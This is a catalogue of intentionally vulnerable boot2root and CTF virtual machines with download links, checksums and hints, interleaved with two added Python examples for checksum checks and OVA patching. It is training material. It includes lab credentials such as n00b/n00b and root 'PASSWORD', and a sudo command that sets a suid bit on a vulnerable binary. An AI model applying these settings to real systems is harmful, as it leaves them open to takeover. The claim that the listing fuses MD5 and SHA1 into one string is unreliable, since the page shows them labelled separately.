The Pentesters: 64-Bit AppSec Primer (Beta)
Released: 1 Jul 2016 | Author: Austin Wile | Series: The Pentesters | Size: 1.3 GB
Download: https://download.vulnhub.com/64bitprimer/64bitprimer.ova

Here at The Pentesters, we have a passion for application security and all that goes with it. We think that application security is an extremely important part of the field of information security and have "made it our business", so to speak, to provide a means of education into modern-day application security. With modern computing becoming more and more advanced, and the requirements for understanding the functionality and security behind said computing becoming equally challenging, we figured that a set of challenges dedicated to learning the mere basics of 64-bit appsec would be beneficial to the security community.

The 64-Bit AppSec Primer consists of 16 challenges, each more difficult than the previous one, dedicated to learning the basics of 64-bit binary exploitation and reverse engineering. The x64 instruction set, as you would expect, has many new instructions, registers, and calling conventions in comparison to the traditional x86 instruction set. Our goal with this challenge is to get you inside a debugger with intentionally vulnerable binaries, looking at the inner workings of a 64-bit binary. Alongside the increased complexity of the instruction set comes an equal increase in the complexity of exploitation, which, as a penetration tester and security engineer, will prove useful to understand. The challenges consist of varying vulnerabilities and anti-debugger tricks in binaries, such as:

As a bonus, we would like to contribute back to the security community. We are donating the VM to VulnHub, for all to have, and we are also offering prizes to the three people who give us the most robust and complete write-ups for the challenges. In order to qualify for the prizes, you must post your write-up on either your personal blog or website (your choice), and post a link to http://thepentesters.net/challenge/ along with your username. If you are unable to solve all of the challenges, that is okay; we will still accept your write-up for judging, as we still want to see what you completed and how you did it. Here are the prizes:

The challenge ends on August 31st, 2016. All write-ups must be submitted by then; whoever has written the best write-up with the most detailed explanations wins. The judging will be done by our pentesting team. Also, I would like to note a couple of rules for the reverse engineering challenges. There are a couple of challenges that don't have "flags", but you will know when you have solved those; please note your findings and take screenshots of them as well. As for the VM, you are to ssh in as user n00b with password n00b, where you will find gdb-peda installed to make your life easier. The VM gets its IP through DHCP and is set to a host-only adapter in VMware, so it should work for you straight out of the box, so to speak. That is all I have for you and I hope you enjoy.

MD5: A61B36DAA7ADBCF57E8DD499E82695CB | SHA1: 26E74509F7C869BB146727BEE85782D3243328F9
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
PwnLab: init
Released: 1 Aug 2016 | Author: Claor | Series: PwnLab | Size: 785 MB
Download: https://download.vulnhub.com/pwnlab/pwnlab_init.ova

Welcome to "PwnLab: init", my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read the flag.

You can contact me at: or on Twitter: @Chronicoder

MD5: CE8AB26DE76E5883E67D6DE04C0F6E43 | SHA1: 575F19216A3FA3E377EFE69D5BF715913F294A3B
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Mr-Robot: 1
Released: 28 Jun 2016 | Author: Leon Johnson | Series: Mr-Robot | Size: 704 MB
Download: https://download.vulnhub.com/mrrobot/mrRobot.ova

Based on the show Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively more difficult to find. The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

MD5: BC02C42815EAC4E872D753E1FD12DDC8 | SHA1: DC0EB84DA4C62284C688590EE092868CE84A09AB
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
6Days Lab: 1.1
Released: 25 Jul 2016 | Author: CanYouPwn.Me | Series: 6Days Lab | Size: 682 MB
Download: https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova

Boot2root machine for educational purposes. Our first boot2root machine; execute /flag to complete the game. Try your skills against an environment protected by IDS and sandboxes! "Our product Rashomon IPS is so good, even we use it!" they claim. Hope you enjoy.

v1.0 - 2016-07-12
v1.1 - 2016-07-25

MD5: 98DE1E26447B2BFF260DF10441225820 | SHA1: C56F6774F51A22571E6F0D7033639AC86DC822C0
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Breach: 2.1
Released: 15 Aug 2016 | Author: mrb3n | Series: Breach | Size: 1.3 GB
Download: https://download.vulnhub.com/breach/Breach-2_final2.1.zip

Second in a multi-part series, Breach 2.0 is a boot2root/CTF challenge which attempts to showcase a real-world scenario, with plenty of twists and trolls along the way. The VM is configured with a static IP, so you'll need to configure your host-only adaptor to this subnet. Sorry! Last one with a static IP 😉

A hint: imagine this as a production environment during a busy work day.

Shout-out to knightmare for many rounds of testing and assistance with the final configuration, as well as rastamouse, twosevenzero and g0blin for testing and providing valuable feedback. As always, thanks to g0tmi1k for hosting and maintaining #vulnhub.

VirtualBox users: if the screen goes black on boot once past the GRUB screen, go to Settings -> General and make sure it says Type: Linux, Version: Debian (64-bit). If you run into any issues, you can find me on Twitter: https://twitter.com/mrb3n813 or on IRC in #vulnhub. Looking forward to the write-ups, especially any unintended paths to local/root. Happy hunting!

SHA1: D8F33A9234E107CA745A8BEC853448408AD4773F

Note: v2.1 fixes a few issues.

Changelog:
2016-08-22 - v2.1
2016-08-15 - v2.0

MD5: 90E8871E8EB68ADBEB82659FE1F11831 | SHA1: 069B529B6701FDF9F82840F9918842921FFB7A1E
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Disabled | IP: 192.168.110.151
SecTalks: BNE0x02 - Fuku
Released: 9 Oct 2015 | Author: Robert Winkel | Series: SecTalks | Size: 2.0 GB
Download: https://download.vulnhub.com/sectalks/Fuku.ova

Fuku (pronounced "far queue") CTF is designed to fuck with people.

[This is a boot2root. Import it in VirtualBox using a Host Only adapter, or use an adapter that will assign it an IP address in the range. It only likes having an IP address in that range. Treat the box as if it was on the network. Don't try to do anything to it that you could only do with physical access, e.g. break into the BIOS or the GRUB boot loader. There are a few flag.txt files to grab. The final one is in the /root/ directory. However, the ultimate goal is to get a root shell.

"Bull was pissed when you broke into his Minotaur box. He has taken precautions with another website that he is hosting, implementing IDS, whitelisting, and obfuscation techniques. He is now taunting hackers to try and hack him, believing himself to be safe. It is up to you to put him in his place."

The VM is located at https://www.dropbox.com/s/e2x79z5ovqqsejg/Fuku.ova?dl=0 File size: 2GB]

Contact @RobertWinkel for more hints.

MD5: F27CB4A2E792805C8B93F99CFA852D69 | SHA1: 4524CA5DDCE06C09E5EDB4F94802B02476AC7D6F
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Disabled | IP: 192.168.56.0
Sidney: 0.2
Released: 3 Jun 2016 | Author: knightmare | Series: Sidney | Size: 921 MB
Download: https://download.vulnhub.com/sidney/Sidney0.2.ova

Welcome to my third boot2root / CTF; this one is called Sidney. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag, and being me, it's never where they normally live... 😎

If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56

Some hints for you:

SHA1SUM: 114ABA151B77A028AA5CFDAE66D3AEC6EAF0751A sidney.ova

Many thanks to Rasta_Mouse and GKNSB for testing this CTF. Special thanks and shout-outs go to GKNSB and Rasta_Mouse; hopefully he streams this one live too! Also a shout-out to g0tmi1k for #vulnhub and offering to host my third CTF.

MD5: 4725E5ABABA7F840B56C5F4AE67F35CB | SHA1: 114ABA151B77A028AA5CFDAE66D3AEC6EAF0751A
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
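Every entry on this page lists an MD5 and a SHA1 for its download, and several authors (Sidney above, Droopy, SpyderSec) repeat the SHA1 in their own text. Checking a multi-gigabyte OVA against both before importing it is the step the listing leaves to the reader. The following is an added example, not code from VulnHub or from any VM author on this page: it hashes the file in 1 MiB chunks so a 2 GB image never sits in memory, compares case-insensitively (the listing prints upper-case hex, hashlib returns lower-case), and includes a helper for the way this listing runs the two digests together into one 72-character string, a split confirmed by the Sidney SHA1SUM quoted above. The file name sidney.ova in the demonstration is the one the author quotes. A matching digest shows the download arrived intact; it does not vouch for the image, since the digests come from the same site as the file.

```python
import hashlib
import io
from typing import BinaryIO, Tuple

CHUNK = 1024 * 1024  # 1 MiB reads keep memory flat for multi-gigabyte images
HEX_DIGITS = set("0123456789abcdefABCDEF")


def digests_of_stream(stream: BinaryIO) -> Tuple[str, str]:
    """Return (md5, sha1) lower-case hex digests of a binary stream, read in chunks."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    for block in iter(lambda: stream.read(CHUNK), b""):
        md5.update(block)
        sha1.update(block)
    return md5.hexdigest(), sha1.hexdigest()


def digests_of_bytes(data: bytes) -> Tuple[str, str]:
    """Same as digests_of_stream for data already in memory."""
    return digests_of_stream(io.BytesIO(data))


def split_fused_digest(fused: str) -> Tuple[str, str]:
    """Split the 72-character string this listing prints into (MD5, SHA1).

    The listing runs the two checksums together: 32 hex characters of MD5
    followed by 40 of SHA1. The split is confirmed by the entries whose
    description quotes the SHA1 on its own (Sidney, Droopy, SpyderSec).
    """
    fused = fused.strip()
    if len(fused) != 72 or not set(fused) <= HEX_DIGITS:
        raise ValueError("expected 32 hex characters of MD5 followed by 40 of SHA1")
    return fused[:32], fused[32:]


def matches(actual: Tuple[str, str], expected_md5: str, expected_sha1: str) -> bool:
    """True only if BOTH digests match; case-insensitive because the listing
    prints upper-case hex while hashlib returns lower-case."""
    md5, sha1 = actual
    return (md5 == expected_md5.strip().lower()
            and sha1 == expected_sha1.strip().lower())


def verify_download(path: str, expected_md5: str, expected_sha1: str) -> bool:
    """Hash the file at path and compare against the listed values."""
    with open(path, "rb") as fh:
        return matches(digests_of_stream(fh), expected_md5, expected_sha1)


if __name__ == "__main__":
    # Fused digest and file name exactly as given in the Sidney entry above.
    sidney_md5, sidney_sha1 = split_fused_digest(
        "4725E5ABABA7F840B56C5F4AE67F35CB114ABA151B77A028AA5CFDAE66D3AEC6EAF0751A"
    )
    try:
        ok = verify_download("sidney.ova", sidney_md5, sidney_sha1)
    except FileNotFoundError:
        raise SystemExit("sidney.ova not found in the current directory")
    print("sidney.ova:", "digests match, import it" if ok else "MISMATCH, do not import")
    raise SystemExit(0 if ok else 1)
```

Both digests are required to match: MD5 alone is easy to collide, and the listing gives you SHA1 for free, so there is no reason to accept a file on the weaker check only.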
Gibson: 0.2
Released: 15 May 2016 | Author: knightmare | Series: Gibson | Size: 642 MB
Download: https://download.vulnhub.com/gibson/gibson.ova

Welcome to another boot2root / CTF; this one is called Gibson. The VM is set to grab a DHCP lease on boot. It doesn't matter what your local subnet is, as long as you keep away from the subnet. You will see why soon enough...

Once again, I'll offer some hints to you:

SHA1SUM:

Many thanks to g0blin and GKNSB for testing this CTF. Special thanks and shout-outs go to Barrebas and Rasta_Mouse, and g0tmi1k for more advice and offering to host my second CTF. Kudos to g0blin for advising on how to use this in Vi.

VirtualBox users can run:

MD5: 06464F2A6C5D755CBFB1471D757BB420 | SHA1: F4601F62B7011CC6AD403553CB8A9375E43CB0B5
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Stapler: 1
Released: 8 Jun 2016 | Author: g0tmi1k | Series: Stapler | Size: 707 MB
Download: https://download.vulnhub.com/stapler/Stapler.zip
Slides: https://download.vulnhub.com/stapler/slides.pdf

MD5: A30EA8F606102F2F929AAFB198D8B019 | SHA1: 18165C527DF1EC7B2B80CC82E5BEBE88A9323013
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Droopy: v0.2
Released: 17 Apr 2016 | Author: knightmare | Series: Droopy | Size: 455 MB
Download: https://download.vulnhub.com/droopy/DroopyCTF.ova

Welcome to Droopy. This is a beginner's boot2root/CTF VM. The VM is set to grab a DHCP lease on boot. There are 2 hints I would offer you:
1.) Grab a copy of the rockyou wordlist.
2.) It's fun to read other people's email.

SHA1SUM: e6862fa5ebc9c2a8e582e77f440510062afe47ba droopyctf.ova

Special thanks and shout-outs go to Barrebas and Rasta_Mouse for testing, and g0tmi1k for advice and offering to host my first CTF.

MD5: 2961AD42C047F9DC8C0E3D9CAA952696 | SHA1: E6862FA5EBC9C2A8E582E77F440510062AFE47BA
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
VulnOS: 2
Released: 17 May 2016 | Author: c4b3rw0lf | Series: VulnOS | Size: 763 MB
Download: https://download.vulnhub.com/vulnos/VulnOSv2.7z

Smaller, less chaotic! As time is not always on my side, it took a long time to create another VulnOS. But I like creating them. The image is built with VBOX. Unpack the file and add it to your virtualisation software.

NOTE: the current keyboard preference is BE.

"pentesting is a wide concept"

If you have questions, feel free to contact me on dot com. Shout out to the Vulnhub Testing team! Hope you enjoy.

MD5: 0C84AE77AE3C47F84E8B0F830D3C43B4 | SHA1: A77E312E8A3900C9FDA61421C3C9F2FB78F819BD
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
SecTalks: BNE0x03 - Simple
Released: 9 Oct 2015 | Author: Robert Winkel | Series: SecTalks | Size: 593 MB
Download: https://download.vulnhub.com/sectalks/Simple.ova

Simple CTF is a boot2root that focuses on the basics of web-based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don't have physical access to this machine. Therefore, tricks like editing the VM's BIOS or GRUB configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.

[I suggest you use VirtualBox or VMware Player with a Host Only adapter. The VM will assign itself an IP address through DHCP. https://www.dropbox.com/s/9spf5m9l87zjlps/Simple.ova?dl=0 File size: 600MB]

Contact @RobertWinkel for more hints.

Requires VirtualBox Extension Pack.

MD5: 6D452F0A658B453706F41A5A694D99A1 | SHA1: 8E1D16D500E7BBC218D150F8A199B3C14D730B2C
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
SkyDog: 1
Released: 2 Nov 2015 | Author: James Bower | Series: SkyDog | Size: 580 MB
Download: https://download.vulnhub.com/skydog/SkyDogCTF.ova (also http://bit.ly/SkyDogConCTF)

The CTF is a virtual machine and works best in VirtualBox. This OVA was created using VirtualBox 4.3.32. Download the OVA file, open up VirtualBox and then select File -> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above, it is best to disable the USB 2.0 setting before booting up the VM. The networking is set up for a NAT Network, but you can change this before booting up depending on your networking setup. If you have any questions, please send me a message on Twitter @jamesbower and I'll be happy to help.

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself. The six flags are in the form of flag{MD5 Hash}, such as flag{1a79a4d60de6718e8e5b326e338ae533}.

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn't Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

You may need to disable the USB device in VirtualBox for it to start up.

MD5: DF6B5201C29C9157B852C383D4760643 | SHA1: EA2DCACC68837D3E24DE32C88CD2FC4EE026030F
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Seattle: v0.3
Released: 4 Oct 2016 | Author: HollyGraceful | Series: Seattle | Size: 580 MB
Download: https://download.vulnhub.com/seattle/Seattle-

VulnVM is a web application running on a virtual machine; it's designed to simulate a simple eCommerce-style website which is purposely vulnerable to a number of well-known security issues commonly seen in web applications. This is really a pre-release preview of the project, but it's certainly functional as it stands; I'm planning on doing a lot of work on this in the near future.

The plan is ultimately to have the application vulnerable to a large number of issues, with a selection of different filters at different difficulties. That way, as testers become better at detecting and exploiting issues, the application can be hardened against common exploitation methods to allow the testers a wider range of experiences. The first filters have now been implemented! The application now supports "levels", where Level 1 includes no real filtration of user input and Level 2 includes a simple filter for each vulnerable function.

Currently it's vulnerable to:

Install p7zip to unzip *.7z files on Fedora:

Install p7zip to unzip *.7z files on Debian and Ubuntu:

Extract the archive:

Then you can simply start up the virtual machine using VirtualBox! The root user account has a password of PASSWORD

MD5: 0175A804BB4FCBB2F3DC341C0668AFE4 | SHA1: 41434C47FE48584621EE724A0CD541CDFB71CEC8
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
SickOs: 1.2
Released: 27 Apr 2016 | Author: D4rk | Series: SickOs | Size: 664 MB
Download: https://download.vulnhub.com/sickos/sick0s1.2.zip

Need to use VMware. You may have issues with VirtualBox. Possible solution: open the .ovf file and replace all instances of "ElementName" with "Caption", and replace "vmware.sata.ahci" with "AHCI". Also remove the .mf file and then import as per normal.

MD5: B013BA76F50C15890554632A40B697BD | SHA1: 9F45F7C060E15DC6BB93C1CF39EFDD75125E30A0
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
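The OVF edit the SickOs 1.2 author describes above can be done without unpacking anything by hand, because an OVA is a plain tar archive whose first member is the .ovf descriptor. The script below is an added example, not code from the VM author or from VulnHub: it rewrites the descriptor with the two substitutions named above, drops the .mf manifest (its SHA digests would no longer match the edited descriptor, which is why the author says to remove it), and streams every other member through unchanged and in order. The sample descriptor, manifest and disk member it builds for the demonstration are constructed here, not taken from sick0s1.2.zip, and the member names are placeholders. One caveat worth keeping in mind: removing the manifest removes the hypervisor's own integrity check on the import, so verify the archive's listed checksums first and patch afterwards.

```python
import io
import tarfile
from typing import Dict, List, Tuple

# The two textual substitutions the SickOs 1.2 entry gives for importing the
# VMware-built OVA into VirtualBox.
OVF_REPLACEMENTS = (
    ("ElementName", "Caption"),
    ("vmware.sata.ahci", "AHCI"),
)


def _patch_members(src: tarfile.TarFile, dst: tarfile.TarFile) -> List[str]:
    """Copy src to dst, rewriting *.ovf, dropping *.mf, keeping member order."""
    log = []
    for member in src.getmembers():
        lower = member.name.lower()
        if lower.endswith(".mf"):
            # The manifest lists SHA digests of the other members. It would no
            # longer match the edited descriptor, so it has to go; the price is
            # that the hypervisor can no longer integrity-check the import.
            log.append(f"dropped manifest {member.name}")
            continue
        if not member.isfile():
            dst.addfile(member)          # directories etc.: metadata only
            continue
        fh = src.extractfile(member)
        if lower.endswith(".ovf"):
            text = fh.read().decode("utf-8")
            for old, new in OVF_REPLACEMENTS:
                log.append(f"{member.name}: {old} -> {new} ({text.count(old)} hits)")
                text = text.replace(old, new)
            raw = text.encode("utf-8")
            info = tarfile.TarInfo(member.name)
            info.size, info.mtime, info.mode = len(raw), member.mtime, member.mode
            dst.addfile(info, io.BytesIO(raw))
        else:
            dst.addfile(member, fh)      # disk images stream through untouched
            log.append(f"copied {member.name} ({member.size} bytes)")
    return log


def fix_ova_file(src_path: str, dst_path: str) -> List[str]:
    """Stream one OVA into another; a 600 MB disk image is never held in memory.
    USTAR is the tar flavour the OVF packaging spec expects."""
    with tarfile.open(src_path, "r:") as src, \
            tarfile.open(dst_path, "w:", format=tarfile.USTAR_FORMAT) as dst:
        return _patch_members(src, dst)


def fix_ova_bytes(ova: bytes) -> Tuple[bytes, List[str]]:
    """In-memory variant of fix_ova_file (used by the demonstration below)."""
    out = io.BytesIO()
    with tarfile.open(fileobj=io.BytesIO(ova), mode="r:") as src, \
            tarfile.open(fileobj=out, mode="w:", format=tarfile.USTAR_FORMAT) as dst:
        log = _patch_members(src, dst)
    return out.getvalue(), log


def read_ova(ova: bytes) -> Dict[str, bytes]:
    """Member name -> content, in archive order; for inspecting a result."""
    with tarfile.open(fileobj=io.BytesIO(ova), mode="r:") as tf:
        return {m.name: tf.extractfile(m).read() for m in tf.getmembers() if m.isfile()}


# Constructed stand-in for the descriptor: only the two strings the author
# names matter, the rest is filler in OVF shape (not the real sick0s1.2.ovf).
SAMPLE_OVF = b"""<Envelope xmlns="http://schemas.dmtf.org/ovf/envelope/1">
  <VirtualSystem>
    <Item>
      <rasd:ElementName>SATA Controller</rasd:ElementName>
      <rasd:ResourceSubType>vmware.sata.ahci</rasd:ResourceSubType>
    </Item>
  </VirtualSystem>
</Envelope>
"""


def build_sample_ova() -> bytes:
    """A three-member OVA (descriptor, manifest, tiny fake disk) made up for the demo."""
    out = io.BytesIO()
    with tarfile.open(fileobj=out, mode="w:", format=tarfile.USTAR_FORMAT) as tf:
        for name, data in (("sick0s1.2.ovf", SAMPLE_OVF),
                           ("sick0s1.2.mf", b"SHA1(sick0s1.2.ovf)= 0000\n"),
                           ("sick0s1.2-disk1.vmdk", b"KDMV" + b"\0" * 64)):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return out.getvalue()


if __name__ == "__main__":
    patched, log = fix_ova_bytes(build_sample_ova())
    print("\n".join(log))
    print(read_ova(patched)["sick0s1.2.ovf"].decode())
```

For the real archive, unzip sick0s1.2.zip and call fix_ova_file on the .ova inside; the returned log tells you how many occurrences of each string were rewritten, which is a quick sanity check that you operated on the right descriptor.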
SecTalks: BNE0x00 - Minotaur
Released: 9 Oct 2015 | Author: Robert Winkel | Series: SecTalks | Size: 676 MB
Download: https://download.vulnhub.com/sectalks/minotaur_CTF_BNE0x00.ova

Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don't have physical access to this machine. Therefore, tricks like editing the VM's BIOS or GRUB configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.

[I suggest you use VirtualBox with a Host Only adapter to run Minotaur fairly painlessly. The VM will assign itself a specific IP address (in the range). Do not change this, as the CTF will not work properly without an IP address of 192.168.56.X. If you load the .ova file in VirtualBox, you can see this machine from another VirtualBox machine with a "Host Only" network adapter. You can see the machine from VMware Workstation by:
- Going into Virtual Network Editor and changing the VMnet0 network to "Bridged to: VirtualBox Host-Only Ethernet Adapter".
- Setting your VMware network adapter to Custom (VMnet0).
- If necessary, resetting your network adapter (e.g. ifdown eth0 && ifup eth0) so that you get an address.
The VM is located here: https://www.dropbox.com/s/zyxbampga87nqv3/minotaur_CTF_BNE0x00.ova?dl=0 File size: 691MB]

Contact @RobertWinkel for more hints.

MD5: 5CB751E8A017EB13702377E86D07CA86 | SHA1: E2656937662CBB8DE23E92E0D3346A8A0A19C2C2
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Disabled | IP: 192.168.56.0
Milnet: 1
Released: 1 Jun 2016 | Author: Warrior | Series: Milnet | Size: 835 MB
Download: https://download.vulnhub.com/milnet/milnet-1.0-ova.tgz

Welcome to 1989! And welcome to Germany! This VM is inspired by a book! There should be plenty of hints which one it is, if you haven't read it. This is a simple VM, so don't fear any advanced exploitation, reverse engineering or other advanced techniques! Just a solid and simple advanced persistent threat (admins) 😉 So the level is clearly: beginner (as intended). For some it may teach a solid (old) new privesc technique that, together with the above-mentioned book, inspired me to make this VM. I made the effort to throw some very basic story/polish into it. Also, if everything runs smoothly, the VM should show its IP address on the login screen on the console! -No, I don't consider finding the VM in your own network a real challenge 😉-

If you should encounter any problems or want to drop me a line, use #milet and @teh_warriar on Twitter or chat me up in #vulnhub! Hope you enjoy this VM! Gonna enjoy reading some writeups and hope you might find other ways than the intended ones!

Best Regards, Warrior

To convert the VM so it works with VirtualBox: qemu-img convert

MD5: 0EFD13A81D071B9350DDA805CFE0F39F | SHA1: A5FC8F453BB0E6F9DED7FE2FA280A92E47D0893B
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
NETinVM: November 3, 2016
Released: 3 Nov 2016 | Authors: Carlos Perez & David Perez | Series: NETinVM | Size: 2.2 GB
Download: https://download.vulnhub.com/netinvm/netinvm_2016-11-03_vmware.zip

A tool for teaching and learning about systems, networks and security
Authors: Carlos Perez & David Perez
Date: 2016-11-03

NETinVM is a VMware virtual machine image that provides the user with a complete computer network. For this reason, NETinVM can be used for learning about operating systems, computer networks and system and network security. In addition, since NETinVM is a VMware image, it can be used for demonstrations (i.e. in classrooms) that can be reproduced by students either in a laboratory or on their own laptop and thus at home, at the library... For these reasons we present NETinVM as an educational tool.

NETinVM is a VMware virtual machine image that contains, ready to run, a series of User-mode Linux (UML) virtual machines. When started, the UML virtual machines create a whole computer network; hence the name NETinVM, an acronym for NETwork in Virtual Machine. This virtual network has been called 'example.net' and has fully qualified domain names defined for the systems: 'base.example.net', 'fw.example.net', etc.

All of the virtual machines use the Linux operating system. The VMware virtual machine is called 'base' and it runs openSUSE 13.2. User-mode Linux machines use Debian 6.0 and they have different names depending on their network location, because they are grouped into three different subnets: corporate, perimeter and external. The subnetworks are named 'int' (for internal network), 'dmz' (for DMZ or demilitarized zone, usually used as a synonym for perimeter network) and 'ext' (for external network). One of the UML machines, 'fw', interconnects the three networks ('int', 'dmz' and 'ext'), allowing for communication and packet filtering. The rest of the UML machines have only one network interface, connected to the network they are named after:
+ UMLs connected to the internal network.
+ UMLs connected to the perimeter network (DMZ). They are supposed to be bastion nodes. Two preconfigured bastion nodes are provided, each one with its appropriate alias:
  + 'dmza' is aliased as 'www.example.net' and it offers HTTP and HTTPS services.
  + 'dmzb' is aliased as 'ftp.example.net' and it offers FTP.
+ UMLs connected to the external network (i.e. Internet).

Because a picture paints a thousand words, or so they say, the following figure shows NETinVM with all of the virtual machines running inside. All of the elements referenced before are shown in the image with their IP and ethernet addresses. The following rules have been used for assigning addresses:

In addition to the computers and networks already described, the figure also shows the real computer where NETinVM runs ('REAL COMPUTER') and VMware Player's typical network interface ('vmnet8'), which optionally interconnects NETinVM's networks with the external world.

When they boot, all UML virtual machines get their network configuration from 'base', which provides DHCP and DNS services to the three NETinVM networks through its interfaces 'tap0', 'tap1' and 'tap2'. Routing works as follows:

Communication between 'base' and any UML machine, in both directions, is direct, without going through 'fw'. (When the communication is started from a UML machine, the IP address of the interface of 'base' in the corresponding network must be used.) This configuration permits access from 'base' to all UML machines using SSH independently of the packet filtering configuration at 'fw'. As an additional consideration, please note that the SNAT configuration in 'fw' described above is necessary for responses to outgoing connections to the Internet originating from the internal or perimeter networks to come back through 'fw'. Otherwise they would be routed directly from 'base' to the UML machine through 'tap1' or 'tap2' without traversing 'fw'.

MD5: 3396D92F07D52471FA65B614086DE396 | SHA1: 5EFBDEB2AD825BAFB838C8B11978F9ED32A67D8D
Format: Virtual Machine (VMware) | OS: Linux | DHCP: Enabled | IP: Automatically assign
SmashTheTux: 1.0.1
Released: 1 Apr 2016 | Author: CanYouPwn.Me | Series: SmashTheTux | Size: 616 MB
Download: https://download.vulnhub.com/smashthetux/SmashTheTux_v1.0.1.7z

SmashTheTux is a new VM made by canyoupwn.me for those who want to take a step into the world of binary exploitation. This VM consists of 9 challenges, each introducing a different type of vulnerability. SmashTheTux covers basic exploitation of the following weaknesses:

Credentials:

Have fun!

SmashTheTux v1.0 (18/03/2016): "It appears that we've forgotten to set the necessary permissions on 0x02, sorry about that 😕 Use the root credentials and set the executable file's ownership to root and then add a suid bit. Sorry for the inconvenience.
sudo chown root.tux /home/tux/0x02/pwnme && sudo chmod u+s /home/tux/0x02/pwnme
...Else get v1.0.1"

MD5: 63FEDA288163D9155B1BF84D1C6C2814 | SHA1: 01DCB1AB85B139A386AD97B41190731509612F59
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
SpyderSec: Challenge
Released: 4 Sep 2015 | Author: SpyderSec | Series: SpyderSec | Size: 2.4 GB
Download: https://download.vulnhub.com/spydersec/SpyderSecChallenge.ova

You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file), which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.

Difficulty: Intermediate

The virtual machine comes in an OVA format, and is a generic 32-bit CentOS Linux build with a single available service (HTTP) where the challenge resides. Feel free to enable bridged networking to have the VM automatically be assigned a DHCP address. This VM has been tested in VMware Workstation 12 Player (choose "Retry" if needed), and VirtualBox 4.3.

SHA1: f60f497f3f8fda0d0aeccfc84dad8e19ad164f55 Challenge.ova
Twitter: @SpyderSec

MD5: C3370138A79E68C2F00BDF3A31F7809B | SHA1: F60F497F3F8FDA0D0AECCFC84DAD8E19AD164F55
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
The Wall: 1
Released: 27 Nov 2015 | Author: Xerubus | Series: The Wall | Size: 286 MB
Download: https://download.vulnhub.com/thewall/thewall.ova

This boot2root box is exclusive to VulnHub. If you have a crack at the challenge, please consider supporting VulnHub for the great work they do for our offsec community.

In 1965, one of the most influential bands of our times was formed... Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd's contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd. Your challenge is simple... set your controls for the heart of the sun, get root, and grab the flag! Rock on!

This works better with VirtualBox than VMware. Note, there is more to this than port scanning...

MD5: A5E6EBDE160239BCE605CCA8E1CF207D | SHA1: A2520E21CF28752FB317F9DDB4143229702BC21B
Format: Virtual Machine (Virtualbox - OVA) | OS: BSD | DHCP: Enabled | IP: Automatically assign
Lord Of The Root: 1.0.1
Released: 23 Sep 2015 | Author: KookSec | Series: Lord Of The Root | Size: 1.6 GB
Download: https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova

I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed for this machine to be very similar in difficulty to those I was breaking on the OSCP. This is a boot-to-root machine and will not require any guest interaction. There are two designed methods for privilege escalation.

If you are having issues with VirtualBox, try the following:

Source: https://twitter.com/dooktwit/status/646840273482330112

MD5: BDDA2E8D966E014FE9301A2FEA81F37C | SHA1: 98FB6280820278D54EE3D62F2DDAAD27A725934E
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Kevgir: 1
Released: 15 Feb 2016 | Author: CanYouPwn.Me | Series: Kevgir | Size: 1.3 GB
Download: https://download.vulnhub.com/kevgir/Kevgir-VM.ova

